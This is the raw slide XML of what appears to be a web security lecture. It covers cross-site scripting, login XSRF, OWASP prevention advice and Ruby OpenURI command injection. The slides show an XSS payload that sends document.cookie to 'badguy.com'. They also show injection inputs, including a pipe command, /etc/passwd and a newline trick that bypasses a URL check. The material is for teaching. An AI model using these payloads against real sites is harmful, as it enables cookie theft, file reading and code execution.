              <a:t>… and display this text:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>messageArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = new Array(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>messageArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[0] = “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = new Image(); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>i.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=‘http://badguy.com/’ + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D084874-0F63-3A46-A668-04894BEF23E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9744500" y="6046129"/>
            <a:ext cx="1923925" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Source: Alex Stamos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346912590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283A4D6B-51AF-DF45-8534-5DA694543D34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:ea typeface="Gulim" panose="020B0600000101010101" pitchFamily="34" charset="-127"/>
              </a:rPr>
              <a:t>Using Login XSRF for XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="83971" name="Picture 10" descr="login-csrf-xss">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16966100-3E2C-0E49-9C6E-5BC543787A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6118" y="2014194"/>
            <a:ext cx="6764360" cy="4454166"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="264015875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8538-4F1C-FC47-845D-76ADBD6D7FDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1136849" y="1348844"/>
            <a:ext cx="5117848" cy="2622651"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="83000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" cap="all" spc="-100" dirty="0"/>
              <a:t>Preventing </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4400" b="0" cap="all" spc="-100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" cap="all" spc="-100" dirty="0"/>
              <a:t>CROSS-SITE SCRIPTING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="A picture containing clipart&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E3A5CCA-FD1F-8F4F-B7B4-77C81D61B1E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7485324" y="1357007"/>
            <a:ext cx="3513108" cy="4229049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA27B083-EF06-174A-91E1-42C83EF8D842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20160852">
            <a:off x="5770172" y="1798560"/>
            <a:ext cx="5339923" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Validate all the inputs!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304061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89090" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{558F307B-D40B-0549-BC36-957755EC37D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="866440" y="1000370"/>
            <a:ext cx="3462079" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to Protect Yourself</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89091" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D50139E2-7ABA-CE4B-A2D1-279599D0795C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963691" y="1000370"/>
            <a:ext cx="6212310" cy="4857262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ensure that your app validates all headers, cookies, query strings, form fields, and hidden fields against a rigorous specification of what should be allowed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do not attempt to identify active content and remove, filter, or sanitize it. There are too many types of active content and too many ways of encoding it to get around filters for such content. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We strongly recommend a ‘positive’ security policy that specifies what is allowed. ‘Negative’ or attack signature based policies are difficult to maintain and are likely to be incomplete. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16DDF2C2-9F01-8746-8338-4807BAD99C91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9763914" y="5800695"/>
            <a:ext cx="1561646" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>Source: OWASP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="443661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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D91BD99C-7A31-F94C-8053-A92EBB9A9679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>What Does This Script Do?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90116" name="Picture 2" descr="http://isc.sans.edu/diaryimages/08mar2801.GIF">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79F6E6B0-8FB1-7142-A000-1DA6FF3E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1905000"/>
            <a:ext cx="84201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589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1569-487B-D146-B350-6594258E3D11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ruby’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenURI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DA08F85-4B76-2640-B5DD-855FC887BFB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="2103120"/>
            <a:ext cx="10058400" cy="3209908"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open(params[:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>])</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solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>open(params[:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]) if params[:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>] =~ /^https://</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{243713A2-9B77-D24A-BEF7-16668F4453EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5609230" y="720590"/>
            <a:ext cx="3942105" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>easy-to-use wrapper for http, https, ftp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE86A5BE-9FCA-DE44-86F7-814F2419D926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4619531" y="899632"/>
            <a:ext cx="775800" cy="385920"/>
            <a:chOff x="4551292" y="888733"/>
            <a:chExt cx="775800" cy="3859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20A22A-4354-7841-852E-EEF009DA840B}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4551292" y="888733"/>
                <a:ext cx="775800" cy="325080"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="5" name="Ink 4">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB20A22A-4354-7841-852E-EEF009DA840B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4533292" y="871093"/>
                  <a:ext cx="8114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493B645-4544-7C49-8F4F-EAAD5732A3AD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4556692" y="1227133"/>
                <a:ext cx="202680" cy="47520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="6" name="Ink 5">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3493B645-4544-7C49-8F4F-EAAD5732A3AD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId5"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="4538692" y="1209133"/>
                  <a:ext cx="238320" cy="83160"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4ABC41A-101C-5743-8AA7-1D7AC7EA5D67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7191641" y="6137410"/>
            <a:ext cx="4544834" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>sakurity.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t>/blog/2015/02/28/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>openuri.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80E0A2B5-788F-F64E-A1B9-00DC808E0242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2361062" y="2784143"/>
            <a:ext cx="7824578" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What if URL is “| ls”?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>If it starts with a pipe, Ruby executes it.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote code execution!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What if URL is “/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>/passwd”?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>That’s a valid URL, Ruby calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kernel.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read any file on the system!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A1B0CCA-26D2-644C-9404-A7F31440D4BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2461541" y="5201899"/>
            <a:ext cx="7858241" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Does this check work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>What if URL is “|touch n;\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>nhttps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>url.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>”?  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
